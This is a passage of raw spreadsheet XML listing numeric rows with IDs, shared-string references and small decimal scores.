      <c r="C15203" s="2" t="s">
        <v>14661</v>
      </c>
      <c r="D15203" s="2">
        <v>1.0</v>
      </c>
      <c r="E15203" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15203" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="15204" ht="15.75" customHeight="1">
      <c r="A15204" s="1">
        <v>33139.0</v>
      </c>
      <c r="B15204" s="2">
        <v>7065764.0</v>
      </c>
      <c r="C15204" s="2" t="s">
        <v>14662</v>
      </c>
      <c r="D15204" s="2">
        <v>1.0</v>
      </c>
      <c r="E15204" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15204" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="15205" ht="15.75" customHeight="1">
      <c r="A15205" s="1">
        <v>33448.0</v>
      </c>
      <c r="B15205" s="2">
        <v>7862792.0</v>
      </c>
      <c r="C15205" s="2" t="s">
        <v>14663</v>
      </c>
      <c r="D15205" s="2">
        <v>1.0</v>
      </c>
      <c r="E15205" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15205" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="15206" ht="15.75" customHeight="1">
      <c r="A15206" s="1">
        <v>33651.0</v>
      </c>
      <c r="B15206" s="2">
        <v>8398850.0</v>
      </c>
      <c r="C15206" s="2" t="s">
        <v>14664</v>
      </c>
      <c r="D15206" s="2">
        <v>1.0</v>
      </c>
      <c r="E15206" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15206" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="15207" ht="15.75" customHeight="1">
      <c r="A15207" s="1">
        <v>2350.0</v>
      </c>
      <c r="B15207" s="2">
        <v>3.3090669E7</v>
      </c>
      <c r="C15207" s="2" t="s">
        <v>14665</v>
      </c>
      <c r="D15207" s="2">
        <v>1.0</v>
      </c>
      <c r="E15207" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15207" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="15208" ht="15.75" customHeight="1">
      <c r="A15208" s="1">
        <v>11966.0</v>
      </c>
      <c r="B15208" s="2">
        <v>2.5677213E7</v>
      </c>
      <c r="C15208" s="2" t="s">
        <v>14666</v>
      </c>
      <c r="D15208" s="2">
        <v>1.0</v>
      </c>
      <c r="E15208" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15208" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="15209" ht="15.75" customHeight="1">
      <c r="A15209" s="1">
        <v>14056.0</v>
      </c>
      <c r="B15209" s="2">
        <v>3.7542339E7</v>
      </c>
      <c r="C15209" s="2" t="s">
        <v>14667</v>
      </c>
      <c r="D15209" s="2">
        <v>1.0</v>
      </c>
      <c r="E15209" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15209" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="15210" ht="15.75" customHeight="1">
      <c r="A15210" s="1">
        <v>14319.0</v>
      </c>
      <c r="B15210" s="2">
        <v>3.869153E7</v>
      </c>
      <c r="C15210" s="2" t="s">
        <v>14668</v>
      </c>
      <c r="D15210" s="2">
        <v>1.0</v>
      </c>
      <c r="E15210" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15210" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="15211" ht="15.75" customHeight="1">
      <c r="A15211" s="1">
        <v>16385.0</v>
      </c>
      <c r="B15211" s="2">
        <v>4622756.0</v>
      </c>
      <c r="C15211" s="2" t="s">
        <v>14669</v>
      </c>
      <c r="D15211" s="2">
        <v>1.0</v>
      </c>
      <c r="E15211" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15211" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="15212" ht="15.75" customHeight="1">
      <c r="A15212" s="1">
        <v>16754.0</v>
      </c>
      <c r="B15212" s="2">
        <v>4.7594751E7</v>
      </c>
      <c r="C15212" s="2" t="s">
        <v>14670</v>
      </c>
      <c r="D15212" s="2">
        <v>1.0</v>
      </c>
      <c r="E15212" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15212" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="15213" ht="15.75" customHeight="1">
      <c r="A15213" s="1">
        <v>19867.0</v>
      </c>
      <c r="B15213" s="2">
        <v>5.7204592E7</v>
      </c>
      <c r="C15213" s="2" t="s">
        <v>14671</v>
      </c>
      <c r="D15213" s="2">
        <v>1.0</v>
      </c>
      <c r="E15213" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15213" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="15214" ht="15.75" customHeight="1">
      <c r="A15214" s="1">
        <v>24441.0</v>
      </c>
      <c r="B15214" s="2">
        <v>1.089644E7</v>
      </c>
      <c r="C15214" s="2" t="s">
        <v>14672</v>
      </c>
      <c r="D15214" s="2">
        <v>1.0</v>
      </c>
      <c r="E15214" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15214" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="15215" ht="15.75" customHeight="1">
      <c r="A15215" s="1">
        <v>24853.0</v>
      </c>
      <c r="B15215" s="2">
        <v>1.2200204E7</v>
      </c>
      <c r="C15215" s="2" t="s">
        <v>14673</v>
      </c>
      <c r="D15215" s="2">
        <v>1.0</v>
      </c>
      <c r="E15215" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15215" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="15216" ht="15.75" customHeight="1">
      <c r="A15216" s="1">
        <v>25712.0</v>
      </c>
      <c r="B15216" s="2">
        <v>1.4530134E7</v>
      </c>
      <c r="C15216" s="2" t="s">
        <v>14674</v>
      </c>
      <c r="D15216" s="2">
        <v>1.0</v>
      </c>
      <c r="E15216" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15216" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="15217" ht="15.75" customHeight="1">
      <c r="A15217" s="1">
        <v>27394.0</v>
      </c>
      <c r="B15217" s="2">
        <v>2.178937E7</v>
      </c>
      <c r="C15217" s="2" t="s">
        <v>14675</v>
      </c>
      <c r="D15217" s="2">
        <v>1.0</v>
      </c>
      <c r="E15217" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15217" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="15218" ht="15.75" customHeight="1">
      <c r="A15218" s="1">
        <v>32617.0</v>
      </c>
      <c r="B15218" s="2">
        <v>5836852.0</v>
      </c>
      <c r="C15218" s="2" t="s">
        <v>14676</v>
      </c>
      <c r="D15218" s="2">
        <v>1.0</v>
      </c>
      <c r="E15218" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15218" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="15219" ht="15.75" customHeight="1">
      <c r="A15219" s="1">
        <v>4159.0</v>
      </c>
      <c r="B15219" s="2">
        <v>4.1504792E7</v>
      </c>
      <c r="C15219" s="2" t="s">
        <v>14677</v>
      </c>
      <c r="D15219" s="2">
        <v>1.0</v>
      </c>
      <c r="E15219" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15219" s="2">
        <v>0.110082304526749</v>
      </c>
    </row>
    <row r="15220" ht="15.75" customHeight="1">
      <c r="A15220" s="1">
        <v>17742.0</v>
      </c>
      <c r="B15220" s="2">
        <v>5.0680936E7</v>
      </c>
      <c r="C15220" s="2" t="s">
        <v>14678</v>
      </c>
      <c r="D15220" s="2">
        <v>1.0</v>
      </c>
      <c r="E15220" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15220" s="2">
        <v>0.110082304526749</v>
      </c>
    </row>
    <row r="15221" ht="15.75" customHeight="1">
      <c r="A15221" s="1">
        <v>32764.0</v>
      </c>
      <c r="B15221" s="2">
        <v>6069505.0</v>
      </c>
      <c r="C15221" s="2" t="s">
        <v>14679</v>
      </c>
      <c r="D15221" s="2">
        <v>1.0</v>
      </c>
      <c r="E15221" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15221" s="2">
        <v>0.110082304526749</v>
      </c>
    </row>
    <row r="15222" ht="15.75" customHeight="1">
      <c r="A15222" s="1">
        <v>380.0</v>
      </c>
      <c r="B15222" s="2">
        <v>1.6329069E7</v>
      </c>
      <c r="C15222" s="2" t="s">
        <v>14680</v>
      </c>
      <c r="D15222" s="2">
        <v>1.0</v>
      </c>
      <c r="E15222" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15222" s="2">
        <v>0.1100823045267489</v>
      </c>
    </row>
    <row r="15223" ht="15.75" customHeight="1">
      <c r="A15223" s="1">
        <v>2380.0</v>
      </c>
      <c r="B15223" s="2">
        <v>3.3320817E7</v>
      </c>
      <c r="C15223" s="2" t="s">
        <v>14681</v>
      </c>
      <c r="D15223" s="2">
        <v>1.0</v>
      </c>
      <c r="E15223" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15223" s="2">
        <v>0.1100823045267489</v>
      </c>
    </row>
    <row r="15224" ht="15.75" customHeight="1">
      <c r="A15224" s="1">
        <v>5839.0</v>
      </c>
      <c r="B15224" s="2">
        <v>4.6923482E7</v>
      </c>
      <c r="C15224" s="2" t="s">
        <v>14682</v>
      </c>
      <c r="D15224" s="2">
        <v>1.0</v>
      </c>
      <c r="E15224" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15224" s="2">
        <v>0.1100823045267489</v>
      </c>
    </row>
    <row r="15225" ht="15.75" customHeight="1">
      <c r="A15225" s="1">
        <v>6263.0</v>
      </c>
      <c r="B15225" s="2">
        <v>4.8118409E7</v>
      </c>
      <c r="C15225" s="2" t="s">
        <v>14683</v>
      </c>
      <c r="D15225" s="2">
        <v>1.0</v>
      </c>
      <c r="E15225" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15225" s="2">
        <v>0.1100823045267489</v>
      </c>
    </row>
    <row r="15226" ht="15.75" customHeight="1">
      <c r="A15226" s="1">
        <v>8322.0</v>
      </c>
      <c r="B15226" s="2">
        <v>5.3641868E7</v>
      </c>
      <c r="C15226" s="2" t="s">
        <v>14684</v>
      </c>
      <c r="D15226" s="2">
        <v>1.0</v>
      </c>
      <c r="E15226" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15226" s="2">
        <v>0.1100823045267489</v>
      </c>
    </row>
    <row r="15227" ht="15.75" customHeight="1">
      <c r="A15227" s="1">
        <v>9545.0</v>
      </c>
      <c r="B15227" s="2">
        <v>5.6025054E7</v>
      </c>
      <c r="C15227" s="2" t="s">
        <v>14685</v>
      </c>
      <c r="D15227" s="2">
        <v>1.0</v>
      </c>
      <c r="E15227" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15227" s="2">
        <v>0.1100823045267489</v>
      </c>
    </row>
    <row r="15228" ht="15.75" customHeight="1">
      <c r="A15228" s="1">
        <v>11393.0</v>
      </c>
      <c r="B15228" s="2">
        <v>2.1547944E7</v>
      </c>
      <c r="C15228" s="2" t="s">
        <v>14686</v>
      </c>
      <c r="D15228" s="2">
        <v>1.0</v>
      </c>
      <c r="E15228" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15228" s="2">
        <v>0.1100823045267489</v>
      </c>
    </row>
    <row r="15229" ht="15.75" customHeight="1">
      <c r="A15229" s="1">
        <v>18586.0</v>
      </c>
      <c r="B15229" s="2">
        <v>5.3255604E7</v>
      </c>
      <c r="C15229" s="2" t="s">
        <v>14687</v>
      </c>
      <c r="D15229" s="2">
        <v>1.0</v>
      </c>
      <c r="E15229" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15229" s="2">
        <v>0.1100823045267489</v>
      </c>
    </row>
    <row r="15230" ht="15.75" customHeight="1">
      <c r="A15230" s="1">
        <v>23608.0</v>
      </c>
      <c r="B15230" s="2">
        <v>6409447.0</v>
      </c>
      <c r="C15230" s="2" t="s">
        <v>14688</v>
      </c>
      <c r="D15230" s="2">
        <v>1.0</v>
      </c>
      <c r="E15230" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15230" s="2">
        <v>0.1100823045267489</v>
      </c>
    </row>
    <row r="15231" ht="15.75" customHeight="1">
      <c r="A15231" s="1">
        <v>25282.0</v>
      </c>
      <c r="B15231" s="2">
        <v>1.3396556E7</v>
      </c>
      <c r="C15231" s="2" t="s">
        <v>14689</v>
      </c>
      <c r="D15231" s="2">
        <v>1.0</v>
      </c>
      <c r="E15231" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15231" s="2">
        <v>0.1100823045267489</v>
      </c>
    </row>
    <row r="15232" ht="15.75" customHeight="1">
      <c r="A15232" s="1">
        <v>32911.0</v>
      </c>
      <c r="B15232" s="2">
        <v>6409446.0</v>
      </c>
      <c r="C15232" s="2" t="s">
        <v>14690</v>
      </c>
      <c r="D15232" s="2">
        <v>1.0</v>
      </c>
      <c r="E15232" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15232" s="2">
        <v>0.1100823045267489</v>
      </c>
    </row>
    <row r="15233" ht="15.75" customHeight="1">
      <c r="A15233" s="1">
        <v>8064.0</v>
      </c>
      <c r="B15233" s="2">
        <v>5.2932293E7</v>
      </c>
      <c r="C15233" s="2" t="s">
        <v>14691</v>
      </c>
      <c r="D15233" s="2">
        <v>1.0</v>
      </c>
      <c r="E15233" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15233" s="2">
        <v>0.110062893081761</v>
      </c>
    </row>
    <row r="15234" ht="15.75" customHeight="1">
      <c r="A15234" s="1">
        <v>10359.0</v>
      </c>
      <c r="B15234" s="2">
        <v>7308045.0</v>
      </c>
      <c r="C15234" s="2" t="s">
        <v>14692</v>
      </c>
      <c r="D15234" s="2">
        <v>1.0</v>
      </c>
      <c r="E15234" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15234" s="2">
        <v>0.110062893081761</v>
      </c>
    </row>
    <row r="15235" ht="15.75" customHeight="1">
      <c r="A15235" s="1">
        <v>10652.0</v>
      </c>
      <c r="B15235" s="2">
        <v>1.4163731E7</v>
      </c>
      <c r="C15235" s="2" t="s">
        <v>14693</v>
      </c>
      <c r="D15235" s="2">
        <v>1.0</v>
      </c>
      <c r="E15235" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15235" s="2">
        <v>0.110062893081761</v>
      </c>
    </row>
    <row r="15236" ht="15.75" customHeight="1">
      <c r="A15236" s="1">
        <v>11775.0</v>
      </c>
      <c r="B15236" s="2">
        <v>2.4254213E7</v>
      </c>
      <c r="C15236" s="2" t="s">
        <v>14694</v>
      </c>
      <c r="D15236" s="2">
        <v>1.0</v>
      </c>
      <c r="E15236" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15236" s="2">
        <v>0.110062893081761</v>
      </c>
    </row>
    <row r="15237" ht="15.75" customHeight="1">
      <c r="A15237" s="1">
        <v>12466.0</v>
      </c>
      <c r="B15237" s="2">
        <v>2.9408032E7</v>
      </c>
      <c r="C15237" s="2" t="s">
        <v>14695</v>
      </c>
      <c r="D15237" s="2">
        <v>1.0</v>
      </c>
      <c r="E15237" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15237" s="2">
        <v>0.110062893081761</v>
      </c>
    </row>
    <row r="15238" ht="15.75" customHeight="1">
      <c r="A15238" s="1">
        <v>13453.0</v>
      </c>
      <c r="B15238" s="2">
        <v>3.5188247E7</v>
      </c>
      <c r="C15238" s="2" t="s">
        <v>14696</v>
      </c>
      <c r="D15238" s="2">
        <v>1.0</v>
      </c>
      <c r="E15238" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15238" s="2">
        <v>0.110062893081761</v>
      </c>
    </row>
    <row r="15239" ht="15.75" customHeight="1">
      <c r="A15239" s="1">
        <v>14429.0</v>
      </c>
      <c r="B15239" s="2">
        <v>3.926164E7</v>
      </c>
      <c r="C15239" s="2" t="s">
        <v>14697</v>
      </c>
      <c r="D15239" s="2">
        <v>1.0</v>
      </c>
      <c r="E15239" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15239" s="2">
        <v>0.110062893081761</v>
      </c>
    </row>
    <row r="15240" ht="15.75" customHeight="1">
      <c r="A15240" s="1">
        <v>16659.0</v>
      </c>
      <c r="B15240" s="2">
        <v>4.7227538E7</v>
      </c>
      <c r="C15240" s="2" t="s">
        <v>14698</v>
      </c>
      <c r="D15240" s="2">
        <v>1.0</v>
      </c>
      <c r="E15240" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15240" s="2">
        <v>0.110062893081761</v>
      </c>
    </row>
    <row r="15241" ht="15.75" customHeight="1">
      <c r="A15241" s="1">
        <v>16722.0</v>
      </c>
      <c r="B15241" s="2">
        <v>4.7475515E7</v>
      </c>
      <c r="C15241" s="2" t="s">
        <v>14699</v>
      </c>
      <c r="D15241" s="2">
        <v>1.0</v>
      </c>
      <c r="E15241" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15241" s="2">
        <v>0.110062893081761</v>
      </c>
    </row>
    <row r="15242" ht="15.75" customHeight="1">
      <c r="A15242" s="1">
        <v>16805.0</v>
      </c>
      <c r="B15242" s="2">
        <v>4.7789573E7</v>
      </c>
      <c r="C15242" s="2" t="s">
        <v>14700</v>
      </c>
      <c r="D15242" s="2">
        <v>1.0</v>
      </c>
      <c r="E15242" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15242" s="2">
        <v>0.110062893081761</v>
      </c>
    </row>
    <row r="15243" ht="15.75" customHeight="1">
      <c r="A15243" s="1">
        <v>18316.0</v>
      </c>
      <c r="B15243" s="2">
        <v>5.237856E7</v>
      </c>
      <c r="C15243" s="2" t="s">
        <v>14701</v>
      </c>
      <c r="D15243" s="2">
        <v>1.0</v>
      </c>
      <c r="E15243" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15243" s="2">
        <v>0.110062893081761</v>
      </c>
    </row>
    <row r="15244" ht="15.75" customHeight="1">
      <c r="A15244" s="1">
        <v>33407.0</v>
      </c>
      <c r="B15244" s="2">
        <v>7727711.0</v>
      </c>
      <c r="C15244" s="2" t="s">
        <v>14702</v>
      </c>
      <c r="D15244" s="2">
        <v>1.0</v>
      </c>
      <c r="E15244" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15244" s="2">
        <v>0.110062893081761</v>
      </c>
    </row>
    <row r="15245" ht="15.75" customHeight="1">
      <c r="A15245" s="1">
        <v>1809.0</v>
      </c>
      <c r="B15245" s="2">
        <v>2.918974E7</v>
      </c>
      <c r="C15245" s="2" t="s">
        <v>14703</v>
      </c>
      <c r="D15245" s="2">
        <v>1.0</v>
      </c>
      <c r="E15245" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15245" s="2">
        <v>0.110042735042735</v>
      </c>
    </row>
    <row r="15246" ht="15.75" customHeight="1">
      <c r="A15246" s="1">
        <v>31076.0</v>
      </c>
      <c r="B15246" s="2">
        <v>4.8316246E7</v>
      </c>
      <c r="C15246" s="2" t="s">
        <v>14704</v>
      </c>
      <c r="D15246" s="2">
        <v>1.0</v>
      </c>
      <c r="E15246" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15246" s="2">
        <v>0.110042735042735</v>
      </c>
    </row>
    <row r="15247" ht="15.75" customHeight="1">
      <c r="A15247" s="1">
        <v>7639.0</v>
      </c>
      <c r="B15247" s="2">
        <v>5.1770338E7</v>
      </c>
      <c r="C15247" s="2" t="s">
        <v>14705</v>
      </c>
      <c r="D15247" s="2">
        <v>1.0</v>
      </c>
      <c r="E15247" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15247" s="2">
        <v>0.1086601307189543</v>
      </c>
    </row>
    <row r="15248" ht="15.75" customHeight="1">
      <c r="A15248" s="1">
        <v>27468.0</v>
      </c>
      <c r="B15248" s="2">
        <v>2.1987682E7</v>
      </c>
      <c r="C15248" s="2" t="s">
        <v>14706</v>
      </c>
      <c r="D15248" s="2">
        <v>1.0</v>
      </c>
      <c r="E15248" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15248" s="2">
        <v>0.1085858585858586</v>
      </c>
    </row>
    <row r="15249" ht="15.75" customHeight="1">
      <c r="A15249" s="1">
        <v>30503.0</v>
      </c>
      <c r="B15249" s="2">
        <v>4.0038826E7</v>
      </c>
      <c r="C15249" s="2" t="s">
        <v>14707</v>
      </c>
      <c r="D15249" s="2">
        <v>1.0</v>
      </c>
      <c r="E15249" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15249" s="2">
        <v>0.1084656084656085</v>
      </c>
    </row>
    <row r="15250" ht="15.75" customHeight="1">
      <c r="A15250" s="1">
        <v>11751.0</v>
      </c>
      <c r="B15250" s="2">
        <v>2.412659E7</v>
      </c>
      <c r="C15250" s="2" t="s">
        <v>14708</v>
      </c>
      <c r="D15250" s="2">
        <v>1.0</v>
      </c>
      <c r="E15250" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15250" s="2">
        <v>0.1084229390681004</v>
      </c>
    </row>
    <row r="15251" ht="15.75" customHeight="1">
      <c r="A15251" s="1">
        <v>28054.0</v>
      </c>
      <c r="B15251" s="2">
        <v>2.4571413E7</v>
      </c>
      <c r="C15251" s="2" t="s">
        <v>14709</v>
      </c>
      <c r="D15251" s="2">
        <v>1.0</v>
      </c>
      <c r="E15251" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15251" s="2">
        <v>0.1084229390681004</v>
      </c>
    </row>
    <row r="15252" ht="15.75" customHeight="1">
      <c r="A15252" s="1">
        <v>2492.0</v>
      </c>
      <c r="B15252" s="2">
        <v>3.389228E7</v>
      </c>
      <c r="C15252" s="2" t="s">
        <v>14710</v>
      </c>
      <c r="D15252" s="2">
        <v>1.0</v>
      </c>
      <c r="E15252" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15252" s="2">
        <v>0.1083788706739526</v>
      </c>
    </row>
    <row r="15253" ht="15.75" customHeight="1">
      <c r="A15253" s="1">
        <v>3091.0</v>
      </c>
      <c r="B15253" s="2">
        <v>3.6680913E7</v>
      </c>
      <c r="C15253" s="2" t="s">
        <v>14711</v>
      </c>
      <c r="D15253" s="2">
        <v>1.0</v>
      </c>
      <c r="E15253" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15253" s="2">
        <v>0.1083788706739526</v>
      </c>
    </row>
    <row r="15254" ht="15.75" customHeight="1">
      <c r="A15254" s="1">
        <v>12259.0</v>
      </c>
      <c r="B15254" s="2">
        <v>2.7999948E7</v>
      </c>
      <c r="C15254" s="2" t="s">
        <v>14712</v>
      </c>
      <c r="D15254" s="2">
        <v>1.0</v>
      </c>
      <c r="E15254" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15254" s="2">
        <v>0.1083333333333333</v>
      </c>
    </row>
    <row r="15255" ht="15.75" customHeight="1">
      <c r="A15255" s="1">
        <v>19234.0</v>
      </c>
      <c r="B15255" s="2">
        <v>5.5075198E7</v>
      </c>
      <c r="C15255" s="2" t="s">
        <v>14713</v>
      </c>
      <c r="D15255" s="2">
        <v>1.0</v>
      </c>
      <c r="E15255" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15255" s="2">
        <v>0.1083333333333333</v>
      </c>
    </row>
    <row r="15256" ht="15.75" customHeight="1">
      <c r="A15256" s="1">
        <v>22492.0</v>
      </c>
      <c r="B15256" s="2">
        <v>3.7089594E7</v>
      </c>
      <c r="C15256" s="2" t="s">
        <v>14714</v>
      </c>
      <c r="D15256" s="2">
        <v>1.0</v>
      </c>
      <c r="E15256" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15256" s="2">
        <v>0.1083333333333333</v>
      </c>
    </row>
    <row r="15257" ht="15.75" customHeight="1">
      <c r="A15257" s="1">
        <v>29271.0</v>
      </c>
      <c r="B15257" s="2">
        <v>3.0991304E7</v>
      </c>
      <c r="C15257" s="2" t="s">
        <v>14715</v>
      </c>
      <c r="D15257" s="2">
        <v>1.0</v>
      </c>
      <c r="E15257" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15257" s="2">
        <v>0.1083333333333333</v>
      </c>
    </row>
    <row r="15258" ht="15.75" customHeight="1">
      <c r="A15258" s="1">
        <v>31315.0</v>
      </c>
      <c r="B15258" s="2">
        <v>4972485.0</v>
      </c>
      <c r="C15258" s="2" t="s">
        <v>14716</v>
      </c>
      <c r="D15258" s="2">
        <v>1.0</v>
      </c>
      <c r="E15258" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15258" s="2">
        <v>0.1083333333333333</v>
      </c>
    </row>
    <row r="15259" ht="15.75" customHeight="1">
      <c r="A15259" s="1">
        <v>1042.0</v>
      </c>
      <c r="B15259" s="2">
        <v>2.3286928E7</v>
      </c>
      <c r="C15259" s="2" t="s">
        <v>14717</v>
      </c>
      <c r="D15259" s="2">
        <v>1.0</v>
      </c>
      <c r="E15259" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15259" s="2">
        <v>0.108286252354049</v>
      </c>
    </row>
    <row r="15260" ht="15.75" customHeight="1">
      <c r="A15260" s="1">
        <v>4692.0</v>
      </c>
      <c r="B15260" s="2">
        <v>4.3231605E7</v>
      </c>
      <c r="C15260" s="2" t="s">
        <v>14718</v>
      </c>
      <c r="D15260" s="2">
        <v>1.0</v>
      </c>
      <c r="E15260" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15260" s="2">
        <v>0.108286252354049</v>
      </c>
    </row>
    <row r="15261" ht="15.75" customHeight="1">
      <c r="A15261" s="1">
        <v>21913.0</v>
      </c>
      <c r="B15261" s="2">
        <v>2.8150089E7</v>
      </c>
      <c r="C15261" s="2" t="s">
        <v>14719</v>
      </c>
      <c r="D15261" s="2">
        <v>1.0</v>
      </c>
      <c r="E15261" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15261" s="2">
        <v>0.108286252354049</v>
      </c>
    </row>
    <row r="15262" ht="15.75" customHeight="1">
      <c r="A15262" s="1">
        <v>28512.0</v>
      </c>
      <c r="B15262" s="2">
        <v>2.6749857E7</v>
      </c>
      <c r="C15262" s="2" t="s">
        <v>14720</v>
      </c>
      <c r="D15262" s="2">
        <v>1.0</v>
      </c>
      <c r="E15262" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15262" s="2">
        <v>0.108286252354049</v>
      </c>
    </row>
    <row r="15263" ht="15.75" customHeight="1">
      <c r="A15263" s="1">
        <v>32064.0</v>
      </c>
      <c r="B15263" s="2">
        <v>5379390.0</v>
      </c>
      <c r="C15263" s="2" t="s">
        <v>14721</v>
      </c>
      <c r="D15263" s="2">
        <v>1.0</v>
      </c>
      <c r="E15263" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15263" s="2">
        <v>0.108286252354049</v>
      </c>
    </row>
    <row r="15264" ht="15.75" customHeight="1">
      <c r="A15264" s="1">
        <v>3536.0</v>
      </c>
      <c r="B15264" s="2">
        <v>3.8683993E7</v>
      </c>
      <c r="C15264" s="2" t="s">
        <v>14722</v>
      </c>
      <c r="D15264" s="2">
        <v>1.0</v>
      </c>
      <c r="E15264" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15264" s="2">
        <v>0.1082862523540489</v>
      </c>
    </row>
    <row r="15265" ht="15.75" customHeight="1">
      <c r="A15265" s="1">
        <v>6282.0</v>
      </c>
      <c r="B15265" s="2">
        <v>4.8156084E7</v>
      </c>
      <c r="C15265" s="2" t="s">
        <v>14723</v>
      </c>
      <c r="D15265" s="2">
        <v>1.0</v>
      </c>
      <c r="E15265" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15265" s="2">
        <v>0.1082862523540489</v>
      </c>
    </row>
    <row r="15266" ht="15.75" customHeight="1">
      <c r="A15266" s="1">
        <v>12747.0</v>
      </c>
      <c r="B15266" s="2">
        <v>3.1106048E7</v>
      </c>
      <c r="C15266" s="2" t="s">
        <v>14724</v>
      </c>
      <c r="D15266" s="2">
        <v>1.0</v>
      </c>
      <c r="E15266" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15266" s="2">
        <v>0.1082862523540489</v>
      </c>
    </row>
    <row r="15267" ht="15.75" customHeight="1">
      <c r="A15267" s="1">
        <v>3565.0</v>
      </c>
      <c r="B15267" s="2">
        <v>3.8907681E7</v>
      </c>
      <c r="C15267" s="2" t="s">
        <v>14725</v>
      </c>
      <c r="D15267" s="2">
        <v>1.0</v>
      </c>
      <c r="E15267" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15267" s="2">
        <v>0.1082375478927203</v>
      </c>
    </row>
    <row r="15268" ht="15.75" customHeight="1">
      <c r="A15268" s="1">
        <v>5446.0</v>
      </c>
      <c r="B15268" s="2">
        <v>4.5631158E7</v>
      </c>
      <c r="C15268" s="2" t="s">
        <v>14726</v>
      </c>
      <c r="D15268" s="2">
        <v>1.0</v>
      </c>
      <c r="E15268" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15268" s="2">
        <v>0.1082375478927203</v>
      </c>
    </row>
    <row r="15269" ht="15.75" customHeight="1">
      <c r="A15269" s="1">
        <v>6128.0</v>
      </c>
      <c r="B15269" s="2">
        <v>4.7797041E7</v>
      </c>
      <c r="C15269" s="2" t="s">
        <v>14727</v>
      </c>
      <c r="D15269" s="2">
        <v>1.0</v>
      </c>
      <c r="E15269" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15269" s="2">
        <v>0.1082375478927203</v>
      </c>
    </row>
    <row r="15270" ht="15.75" customHeight="1">
      <c r="A15270" s="1">
        <v>9151.0</v>
      </c>
      <c r="B15270" s="2">
        <v>5.5272653E7</v>
      </c>
      <c r="C15270" s="2" t="s">
        <v>14728</v>
      </c>
      <c r="D15270" s="2">
